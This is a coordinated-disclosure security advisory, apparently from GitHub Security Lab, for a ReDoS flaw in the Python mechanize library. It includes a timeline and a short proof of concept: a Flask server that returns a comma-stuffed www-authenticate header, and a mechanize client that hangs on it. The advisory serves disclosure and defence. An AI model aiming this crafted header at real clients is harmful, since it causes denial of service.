Coordinated Disclosure Timeline
- 2021-08-31: Created issue asking for contact details.
- 2021-08-31: They added a security policy and closed the issue. I sent the report to email@example.com
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed firstname.lastname@example.org to ask if there will a new release of mechanize and whether there will be an advisory.
- 2021-09-01: Reply from email@example.com: “New version released”
mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
The vulnerable regular expression is here.
mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.
The reproduction steps below first start a webserver, and then starts
You can try to delete the
resp.headers[... line to see how
mechanize should behave.
- Install mechanize and flask:
pip3 install mechanize flask
- Run the server below with
from flask import Flask, make_response app = Flask(__name__) @app.route("/") def home(): resp = make_response("401 Unauthorized") resp.status_code = 401 resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,," return resp if __name__ == "__main__": app.run(debug=True, port=8080)
- Leave the above server running while doing the next steps.
- Run the below with
import mechanize br = mechanize.Browser() br.add_password("http://localhost:8080", "admin", "password") br.open("http://localhost:8080")
This issue may lead to a denial of service.
You can contact the GHSL team at
firstname.lastname@example.org, please include a reference to
GHSL-2021-108 in any communication regarding this issue.